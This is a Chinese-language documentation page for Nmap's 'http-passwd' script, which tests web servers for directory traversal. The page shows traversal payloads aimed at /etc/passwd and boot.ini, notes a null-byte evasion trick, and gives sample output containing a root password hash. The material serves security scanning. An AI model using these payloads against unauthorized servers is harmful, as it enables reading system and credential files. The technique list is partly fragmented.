http-passwd
脚本使用类型:
portrule
脚本所属分类:
intrusive, vuln
脚本下载地址: http://nmap.org/svn/scripts/http-passwd.nse
Checks if a web server is vulnerable to directory traversal by attempting to
retrieve /etc/passwd
or \boot.ini
.
The script uses several technique:
../../../../etc/passwd
.
http-passwd.root
.
Query string tests will be done relative to this path.
The default value is /
. Normally the value should contain a
leading slash. The queries will be sent with a trailing encoded null byte to
evade certain checks; see http://insecure.org/news/P55-01.txt.
执行格式
nmap --script http-passwd --script-args http-passwd.root=/test/ <target>
80/tcp open http | http-passwd: Directory traversal found. | Payload: "index.html?../../../../../boot.ini" | Printing first 250 bytes: | [boot loader] | timeout=30 | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS | [operating systems] |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect 80/tcp open http | http-passwd: Directory traversal found. | Payload: "../../../../../../../../../../etc/passwd" | Printing first 250 bytes: | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh | sshd:*:65532:65534::/:/bin/false | ftp:*:65533:65534::/:/bin/false |_nobody:*:65534:65534::/:/bin/false
Author: Kris Katterjohn, Ange Gutek
License: VER007 整理 http://www.ver007.com